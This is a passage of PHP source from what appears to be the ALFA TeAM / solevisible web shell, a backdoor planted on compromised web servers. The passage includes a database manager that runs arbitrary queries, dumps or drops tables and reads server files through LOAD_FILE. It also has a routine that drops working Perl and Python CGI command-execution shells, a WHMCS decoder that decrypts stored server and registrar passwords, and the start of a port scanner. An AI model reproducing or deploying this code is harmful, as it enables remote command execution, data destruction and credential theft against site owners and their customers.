3225. select file from solevisible;
3226. ");
3227. $r=array();
3228. while($i=$this->fetch()) $r[] = $i['file'];
3229. $this->query('drop table solevisible');
3230. return array('file'=>implode("\n",$r));
3231. break;
3232. } return false;
3233. } function dump($table, $fp = false){ switch($this->type){ case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
3234. $create = mysqli_fetch_array($res);
3235. $sql = $create[1].";
3236. \n";
3237. if($fp) fwrite($fp, $sql);
3238. else echo($sql);
3239. $this->query('SELECT * FROM `'.$table.'`');
3240. $head = true;
3241. while($item = $this->fetch()){ $columns = array();
3242. foreach($item as $k=>$v) { if($v == null) $item[$k] = "NULL";
3243. elseif(is_numeric($v)) $item[$k] = $v;
3244. else $item[$k] = "'".@mysqli_real_escape_string($v)."'";
3245. $columns[] = "`".$k."`";
3246. } if($head) { $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
3247. $head = false;
3248. } else $sql = "\n\t,(".implode(", ", $item).')';
3249. if($fp) fwrite($fp, $sql);
3250. else echo($sql);
3251. } if(!$head) if($fp) fwrite($fp, ";
3252. \n\n");
3253. else echo(";
3254. \n\n");
3255. break;
3256. case 'pgsql': $this->query('SELECT * FROM '.$table);
3257. while($item = $this->fetch()) { $columns = array();
3258. foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'";
3259. $columns[] = $k;
3260. } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');
3261. '."\n";
3262. if($fp) fwrite($fp, $sql);
3263. else echo($sql);
3264. } break;
3265. } return false;
3266. } };
3267. $db = new DbClass($_POST['type']);
3268. if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){ $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
3269. $db->selectdb($_POST['sql_base']);
3270. switch($_POST['charset']){ case "Windows-1251": $db->setCharset('calfa1251');
3271. break;
3272. case "UTF-8": $db->setCharset('utf8');
3273. break;
3274. case "KOI8-R": $db->setCharset('koi8r');
3275. break;
3276. case "KOI8-U": $db->setCharset('koi8u');
3277. break;
3278. case "calfa866": $db->setCharset('calfa866');
3279. break;
3280. } $json = json_decode($_POST['alfa2'],true);
3281. if(count($json['tbl'])>0){ if($_POST['alfa1']=='dumpfile'){ if($fp = @fopen($json['file'],'w')){ foreach($json['tbl'] as $v)$db->dump($v, $fp);
3282. fclose($fp);
3283. $dumpStatus = true;
3284. }}else{ foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
3285. } } unset($_POST['alfa2']);
3286. } alfahead();
3287. echo "
3288. <div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>
3289. <form name='sf' method='post' onsubmit='fs(this);
3290. return false;
3291. '><table cellpadding='2' cellspacing='0'><tr>
3292. <td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
3293. <input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
3294. <td><select name='type'><option value='mysql' ";
3295. if(@$_POST['type']=='mysql')echo 'selected';
3296. echo ">MySql</option><option value='pgsql' ";
3297. if(@$_POST['type']=='pgsql')echo 'selected';
3298. echo ">PostgreSql</option></select></td>
3299. <td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
3300. <td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
3301. <td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
3302. $tmp = "<input type='text' name='sql_base' id='db_name' value=''>";
3303. if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']){ case "Windows-1251": $db->setCharset('calfa1251');
3304. break;
3305. case "UTF-8": $db->setCharset('utf8');
3306. break;
3307. case "KOI8-R": $db->setCharset('koi8r');
3308. break;
3309. case "KOI8-U": $db->setCharset('koi8u');
3310. break;
3311. case "calfa866": $db->setCharset('calfa866');
3312. break;
3313. } $db->setCharset('utf8');
3314. $db->listDbs();
3315. echo "<select name=sql_base><option value=''></option>";
3316. while($item = $db->fetch()) { list($key, $value) = each($item);
3317. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
3318. } echo '</select>';
3319. } else echo $tmp;
3320. }else echo $tmp;
3321. echo "</td>
3322. <td><input type='submit' value=' '></td>
3323. <td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
3324. </tr>
3325. </table>
3326. <script>mysql_cache['host']='".addslashes($_POST['sql_host'])."';
3327. mysql_cache['user']='".addslashes($_POST['sql_login'])."';
3328. mysql_cache['pass']='".addslashes($_POST['sql_pass'])."';
3329. mysql_cache['db']='".addslashes($_POST['sql_base'])."';
3330. mysql_cache['charset']='".addslashes($_POST['charset'])."';
3331. mysql_cache['type']='".addslashes($_POST['type'])."';
3332. mysql_cache['count']='".addslashes($_POST['sql_count'])."'</script>
3333. ";
3334. if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
3335. if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']);
3336. echo "<tr><td width=1 style='border-top:2px solid #666;
3337. '><div class='txtfont'>Tables:</div><br><br>";
3338. $tbls_res = $db->listTables();
3339. while($item = $db->fetch($tbls_res)){ list($key, $value) = each($item);
3340. if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
3341. $value = htmlspecialchars($value);
3342. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;
3343. <a href='javascript:void(0);
3344. ' onclick=\"fs('0','".$value."')\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;
3345. ':" <small>({$n['n']})</small>") . "</nobr><br>";
3346. } echo "<p><input type='checkbox' onclick='is();
3347. '> <input type='button' value=' Dump ' onclick=\"fs('4');
3348. \" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');
3349. \" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>".($dumpStatus?'Success...!':'')."</td><td style='border-top:2px solid #666;
3350. '>";
3351. if(@$_POST['alfa1'] == 'select'){ $_POST['alfa1'] = 'query';
3352. $_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
3353. $db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
3354. $num = $db->fetch();
3355. $pages = ceil($num['n'] / 30);
3356. echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
3357. echo " of $pages";
3358. if($_POST['alfa3'] > 1) echo " <a href='javascript:void(0);
3359. ' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]')>&lt;
3360. Prev</a>";
3361. if($_POST['alfa3'] < $pages) echo " <a href='javascript:void(0);
3362. ' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]')>Next &gt;
3363. </a>";
3364. $_POST['alfa3']--;
3365. $cache_table = $_POST['alfa2'];
3366. if($_POST['type']=='pgsql') $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
3367. else $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
3368. echo "<br><br>";
3369. } if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) { $prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
3370. $db->query(@$_POST['alfa2']);
3371. if($db->res !== false){ $title = false;
3372. echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
3373. $line = 1;
3374. while($item = $db->fetch()) { if(!$title){ echo '<tr><th>#</th>';
3375. foreach($item as $key => $value){ echo '<th>'.$key.'</th>';
3376. } reset($item);
3377. $title=true;
3378. echo '</tr><tr>';
3379. $line = 2;
3380. } if($cache_table!=''){ $cacheMsg = '<a href="javascript:void(0);
3381. " onclick=fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\')>Edit</a>';
3382. }else{ $cacheMsg ='-';
3383. } echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
3384. $line = $line==1?2:1;
3385. foreach($item as $key => $value){ if($value == null) echo '<td><i>null</i></td>';
3386. else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
3387. } echo '</tr>';
3388. } echo '</table>';
3389. } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
3390. } } echo('</form>');
3391. if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){ $data = explode(':',$_POST['alfa3']);
3392. echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
3393. echo("<form onsubmit='fsu(this);
3394. return false;
3395. '><table border='1'>");
3396. if($data[1] != '0'){ $data[2] = __ZGVjb2Rlcg($data[2]);
3397. $data[2] = str_replace('"','',$data[2]);
3398. $fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
3399. $fetch['__ALFAKEY'] = $data[1];
3400. $fetch['__ALFAKEYVAL'] = $data[2];
3401. }else{ $d = __ZGVjb2Rlcg($data[2]);
3402. $fetch = json_decode($d, true);
3403. } foreach($fetch as $key => $value){ if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
3404. $value = htmlspecialchars($value);
3405. echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
3406. } echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
3407. } if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){ $data = json_decode($_POST['alfa2'], true);
3408. $alfadata = $data['__ALFADATA'];
3409. $data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
3410. $keyval = array();
3411. echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
3412. echo("<form onsubmit='fsu(this);
3413. return false;
3414. '><table border='1'>");
3415. $set = '';
3416. foreach($data as $key => $value){ if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
3417. if($data2['__ALFAKEY']==$key){ $keyval['__ALFAKEY'] = $key;
3418. $keyval['__ALFAKEYVAL'] = $value;
3419. } $set .= "`$key` = '".addslashes($value)."',";
3420. $value = htmlspecialchars($value);
3421. echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
3422. } unset($data['__ALFADATA']);
3423. echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
3424. if(!isset($data2['__ALFAKEY'])){ $where = '';
3425. foreach($data2 as $key => $value){ if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
3426. $value = addslashes($value);
3427. $where .= "`$key` = '$value' AND ";
3428. } $where = substr($where, 0, -4);
3429. }else{ $where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
3430. } $set = substr($set, 0, -1);
3431. $db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
3432. if($db->error()) echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
3433. else echo("Success...!");
3434. } if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){ echo "<p>Query:</p><form onsubmit='fs(this);
3435. return false;
3436. '>
3437. <input type='hidden' name='alfa1' value='query'/>
3438. <textarea name='query' style='width:100%;
3439. height:100px'>";
3440. echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
3441. echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
3442. } echo "</td></tr>";
3443. } echo "</table></form><br/>";
3444. if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
3445. if($db->fetch()) echo "<form onsubmit=\"fs('3',this.f.value);
3446. return false;
3447. \"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
3448. } if(@$_POST['alfa1'] == 'loadfile'){ $file = $db->loadFile($_POST['alfa2']);
3449. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
3450. } }else{ echo htmlspecialchars($db->error());
3451. } echo '</div>';
3452. alfafooter();
3453. } function alfaselfrm(){ if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){ echo(__pre().'<center>');
3454. if(@unlink($GLOBALS['__file_path'])){ echo('<b>Shell has been removed</i> :)</b>');
3455. }else{ echo 'unlink error!';
3456. } echo('</center>');
3457. } if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){ echo "<div class=header>";
3458. echo "
3459. <center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
3460. echo '<p><div class="txtfont">Are you kidding me ?? Do you really want to delete this shell??</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');
3461. "> Yes</a>';
3462. echo '</p></center></div>';
3463. } } function alfacgishell(){ alfahead();
3464. echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="g(\'cgishell\',null,\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="g(\'cgishell\',null,\'py\')">| Python | </a>';
3465. if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){ @mkdir('cgialfa',0755);
3466. @chdir('cgialfa');
3467. alfacgihtaccess('cgi');
3468. $name = $_POST['alfa1'].'.alfa';
3469. $perl = '#!/usr/bin/perl -I/usr/local/bandmain'."\n".'use MIME::Base64;
3470. $WinNT = 0;
3471. $NTCmdSep = "&";
3472. $UnixCmdSep = ";
3473. ";
3474. $CommandTimeoutDuration = 10;
3475. $ShowDynamicOutput = 1;
3476. $username = getlogin || getpwuid($<) || "alfa";
3477. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
3478. $CmdPwd = ($WinNT ? "cd" : "pwd");
3479. $PathSep = ($WinNT ? "\\\\" : "/");
3480. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
3481. sub ReadParse {local (*in) = @_ if @_;
3482. local ($i, $loc, $key, $val);
3483. if($ENV{\'REQUEST_METHOD\'} eq "GET"){$in = $ENV{\'QUERY_STRING\'};
3484. }elsif($ENV{\'REQUEST_METHOD\'} eq "POST"){read(STDIN, $in, $ENV{\'CONTENT_LENGTH\'});
3485. }@in = split(/&/, $in);
3486. foreach $i (0 .. $#in){$in[$i] =~ s/\\+/ /g;
3487. ($key, $val) = split(/=/, $in[$i], 2);
3488. $key =~ s/%(..)/pack("c", hex($1))/ge;
3489. $val =~ s/%(..)/pack("c", hex($1))/ge;
3490. $in{$key} .= "\\0" if (defined($in{$key}));
3491. $in{$key} .= $val;
3492. }}sub PrintPageHeader{$EncodedCurrentDir = $CurrentDir;
3493. $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/\'%\'.unpack("H*",$1)/eg;
3494. print "Content-type: text/html\\n\\n";
3495. print \'<html><head><title>Coded by ALFA TeAM - CGI Perl</title></head><body onload="document.getElementById(\\\'cmd\\\').focus();
3496. " bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#FFFFFF"><table border="1" width="100%" cellspacing="0" cellpadding="2"><tr><font color="red"><b>Coded by sole sad & invisible ~ solevisible@gmail.com</b></font><td bgcolor="#000000" bordercolor="#FFFFFF" align="center" width="1%"><b><font size="2" color="#ff0000">#</font></b></td><td bgcolor="#000000" width="98%"><font face="Verdana" size="2"><b> <font color="#22E228"><b>Solevisible Cgi Perl</b></font> Connected to \'.$ServerName.\'</b></td></tr></table>\';
3497. }sub PrintPageFooter{print "</font></body></html>";
3498. }sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$username\\@$ServerName $CurrentDir]\\$ ";
3499. print \'<form onsubmit="this.c.value=btoa(unescape(encodeURIComponent(this.c.value)));
3500. this.d.value=btoa(unescape(encodeURIComponent(this.d.value)));
3501. " name="f" method="POST" action="\'.$ScriptLocation.\'"><input type="hidden" name="d" value="\'.$CurrentDir.\'">\'.$Prompt.\'<input type="text" name="c" id="cmd" size="30"><input type="submit" value=">>"></form>\';
3502. }sub CommandTimeout{if(!$WinNT){alarm(0);
3503. print "</xmp><code>Command exceeded maximum time of $CommandTimeoutDuration second(s).<br>Killed it!";
3504. &PrintCommandLineInputForm;
3505. &PrintPageFooter;
3506. exit;
3507. }}sub ExecuteCommand{if($RunCommand =~ m/^\\s*cd\\s+(.+)/) {$OldDir = $CurrentDir;
3508. $Command = "cd \\"$CurrentDir\\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
3509. chop($CurrentDir = `$Command`);
3510. &PrintPageHeader("c");
3511. $Prompt = $WinNT ? "$OldDir> " : "[$username\\@$ServerName $OldDir]\\$ ";
3512. print "$Prompt $RunCommand";
3513. }else{&PrintPageHeader("c");
3514. $Prompt = $WinNT ? "$CurrentDir> " : "[$username\\@$ServerName $CurrentDir]\\$ ";
3515. print "$Prompt $RunCommand<xmp>";
3516. $Command = "cd \\"$CurrentDir\\"".$CmdSep.$RunCommand.$Redirector;
3517. if(!$WinNT){$SIG{\'ALRM\'} = \\&CommandTimeout;
3518. alarm($CommandTimeoutDuration);
3519. }if($ShowDynamicOutput){$|=1;
3520. $Command .= " |";
3521. open(CommandOutput, $Command);
3522. while(<CommandOutput>){$_ =~ s/(\\n|\\r\\n)$//;
3523. print "$_\\n";
3524. }$|=0;
3525. }else{print `$Command`;
3526. }if(!$WinNT){alarm(0);
3527. }print "</xmp>";
3528. }&PrintCommandLineInputForm;
3529. &PrintPageFooter;
3530. }&ReadParse;
3531. $ScriptLocation = $ENV{\'SCRIPT_NAME\'};
3532. $ServerName = $ENV{\'SERVER_NAME\'};
3533. $RunCommand = decode_base64($in{\'c\'});
3534. $CurrentDir = decode_base64($in{\'d\'});
3535. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
3536. &ExecuteCommand;
3537. ';
3538. $py = '#!/usr/bin/python'."\n".'try:'."\n".''."\t".'import cgitb;
3539. cgitb.enable()'."\n".'except:'."\n".''."\t".'pass'."\n".'import sys,cgi,os,getpass,base64,urllib'."\n".'sys.stderr = sys.stdout'."\n".'from time import strftime'."\n".'import traceback'."\n".'from StringIO import StringIO'."\n".'from traceback import print_exc'."\n".'if os.environ.has_key("SCRIPT_NAME"):'."\n".''."\t".'scriptname = os.environ["SCRIPT_NAME"]'."\n".'else:'."\n".''."\t".'scriptname = ""'."\n".'def alfaCmd(c):'."\n".''."\t".'child_stdin, child_stdout = os.popen2(c)'."\n".''."\t".'child_stdin.close()'."\n".''."\t".'result = child_stdout.read()'."\n".''."\t".'child_stdout.close()'."\n".''."\t".'return result'."\n".'form = cgi.FieldStorage()'."\n".'cmd = form.getvalue(\'c\')'."\n".'dir = form.getvalue(\'d\')'."\n".'if cmd:'."\n".''."\t".'cmd = urllib.unquote(base64.b64decode(cmd))'."\n".'if dir:'."\n".''."\t".'dir = urllib.unquote(base64.b64decode(dir))'."\n".'if cmd:'."\n".''."\t".'if cmd[0:3] == \'cd \':'."\n".''."\t".''."\t".'ncmd = \'cd \' + dir + \';
3540. \' + cmd + \';
3541. pwd\''."\n".''."\t".''."\t".'CurrentDir = alfaCmd(ncmd).replace(\'\\n\',\'\')'."\n".'if not dir and \'CurrentDir\' not in locals():'."\n".''."\t".'CurrentDir = alfaCmd(\'pwd\').replace(\'\\n\',\'\')'."\n".'else:'."\n".''."\t".'if \'CurrentDir\' not in locals():'."\n".''."\t".''."\t".'CurrentDir = dir'."\n".'Prompt = \'[\'+getpass.getuser()+\'@\'+os.environ["SERVER_NAME"]+\' \'+CurrentDir+\']$\''."\n".'theform = \'<form onsubmit="this.c.value=btoa(unescape(encodeURIComponent(this.c.value)));
3542. this.d.value=btoa(unescape(encodeURIComponent(this.d.value)));
3543. " name="f" method="POST" action="\'+scriptname+\'"><input type="hidden" name="d" value="\'+CurrentDir+\'">\'+Prompt+\' <input type="text" name="c" ><input type="submit" size="30" value=">>"></form>\''."\n".'errormess = \'<center><h2>Something Went Wrong</h2><br><pre>\''."\n".'if __name__ == \'__main__\':'."\n".''."\t".'print "Content-type: text/html\\r\\n"'."\n".''."\t".'print \'<body onload="document.f.c.focus();
3544. " bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#FFFFFF"><table border="1" width="100%" cellspacing="0" cellpadding="2"><tr><font color="red"><b>Coded by sole sad & invisible ~ solevisible@gmail.com</b></font><td bgcolor="#000000" bordercolor="#FFFFFF" align="center" width="1%"><b><font size="2" color="#ff0000">#</font></b></td><td bgcolor="#000000" width="98%"><font face="Verdana" size="2"><b> <font color="#22E228"><b>Solevisible Cgi Python</b></font> Connected to \'+os.environ["SERVER_NAME"]+\'</b></td></tr></table>\''."\n".''."\t".'print \'<html><head><title>Coded by ALFA TeAM - CGI Python</title><meta charset="UTF-8"></head>\''."\n".''."\t".'print theform'."\n".''."\t".'if cmd:'."\n".''."\t".''."\t".'print \'<br><br>\''."\n".''."\t".''."\t".'print \'<b>Command : \', cmd, \'</b><br><br>\''."\n".''."\t".''."\t".'print \'Result : <br><br>\''."\n".''."\t".''."\t".'try:'."\n".''."\t".''."\t".''."\t".'cmd = \'cd \' + CurrentDir + \';
3545. \' + cmd'."\n".''."\t".''."\t".''."\t".'print \'<xmp>\'+alfaCmd(cmd)+\'</xmp>\''."\n".''."\t".''."\t".'except Exception, e:'."\n".''."\t".''."\t".''."\t".'print errormess'."\n".''."\t".''."\t".''."\t".'f = StringIO()'."\n".''."\t".''."\t".''."\t".'print_exc(file=f)'."\n".''."\t".''."\t".''."\t".'a = f.getvalue().splitlines()'."\n".''."\t".''."\t".''."\t".'for line in a:'."\n".''."\t".''."\t".''."\t".''."\t".'print line'."\n".''."\t".'print \'</body></html>\'';
3546. if($_POST['alfa1']=='perl'){$code = $perl;
3547. }else{$code = $py;
3548. } if(__write_file($name,$code)){ @chmod($name,0755);
3549. echo __pre().AlfaiFrameCreator('cgialfa/'.$name);
3550. } } echo "</div>";
3551. alfafooter();
3552. } function alfaWhmcs(){ alfahead();
3553. echo '<div class=header>';
3554. function decrypt($string,$cc_encryption_hash){ $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
3555. $hash_key = _hash($key);
3556. $hash_length = strlen ($hash_key);
3557. $string = __ZGVjb2Rlcg($string);
3558. $tmp_iv = substr ($string, 0, $hash_length);
3559. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
3560. $iv = $out = '';
3561. $c = 0;
3562. while ($c < $hash_length) { $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
3563. ++$c;
3564. } $key = $iv;
3565. $c = 0;
3566. while ($c < strlen ($string)) { if (($c != 0 AND $c % $hash_length == 0)) { $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
3567. } $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
3568. ++$c;
3569. } return $out;
3570. } function _hash($string) { if(function_exists('sha1')) { $hash = sha1 ($string);
3571. } else { $hash = md5 ($string);
3572. } $out = '';
3573. $c = 0;
3574. while ($c < strlen ($hash)) { $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
3575. $c += 2;
3576. } return $out;
3577. } AlfaNum(8,9,10);
3578. echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value);
3579. return false;
3580. \">
3581. <input type='hidden' name='form_action' value='2'>";
3582. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50') );
3583. create_table($table);
3584. echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
3585. if($_POST['alfa5']!=''){ $db_host=($_POST['alfa7']);
3586. $db_username=($_POST['alfa3']);
3587. $db_password=($_POST['alfa4']);
3588. $db_name=($_POST['alfa5']);
3589. $cc_encryption_hash=($_POST['alfa6']);
3590. echo __pre();
3591. $conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
3592. $query = mysqli_query($conn,"SELECT * FROM tblservers");
3593. $num = mysqli_num_rows($query);
3594. if ($num > 0){ for($i=0;
3595. $i <=$num-1;
3596. $i++){ $v = @mysqli_fetch_array($query);
3597. $ipaddress = $v['ipaddress'];
3598. $username = $v['username'];
3599. $type = $v['type'];
3600. $active = $v['active'];
3601. $hostname = $v['hostname'];
3602. echo("<center><table border='1'>");
3603. $password = decrypt ($v['password'], $cc_encryption_hash);
3604. echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
3605. echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
3606. echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
3607. echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
3608. echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
3609. echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
3610. echo "</table><br><br></center>";
3611. } $query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
3612. $num1 = @mysqli_num_rows($query1);
3613. if ($num1 > 0){ for($i=0;
3614. $i <=$num1 -1;
3615. $i++){ $v = mysqli_fetch_array($query1);
3616. $registrar = $v['registrar'];
3617. $setting = $v['setting'];
3618. $value = decrypt($v['value'], $cc_encryption_hash);
3619. if ($value==""){ $value=0;
3620. } echo("<center>Domain Reseller <br><center>");
3621. echo("<center><table border='1'>");
3622. echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
3623. echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
3624. echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
3625. echo "</table><br><br></center>";
3626. } } }else{__alert('<font color="red">tblservers is Empty...!</font>');
3627. };
3628. } echo "</div>";
3629. alfafooter();
3630. } function alfaportscanner(){ alfahead();
3631. echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
3632. <form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value);
3633. return false;
3634. ">
3635. <input type="hidden" name="y" value="phptools">
3636. <div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
3637. <div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
3638. <div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
3639. </form></center><br>';
3640. $start = strip_tags($_POST['alfa2']);
3641. $end = strip_tags($_POST['alfa3']);
3642. $host = strip_tags($_POST['alfa4']);
3643. if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){ echo __pre();
3644. $packetContent = "GET / HTTP/1.1\r\n\r\n";
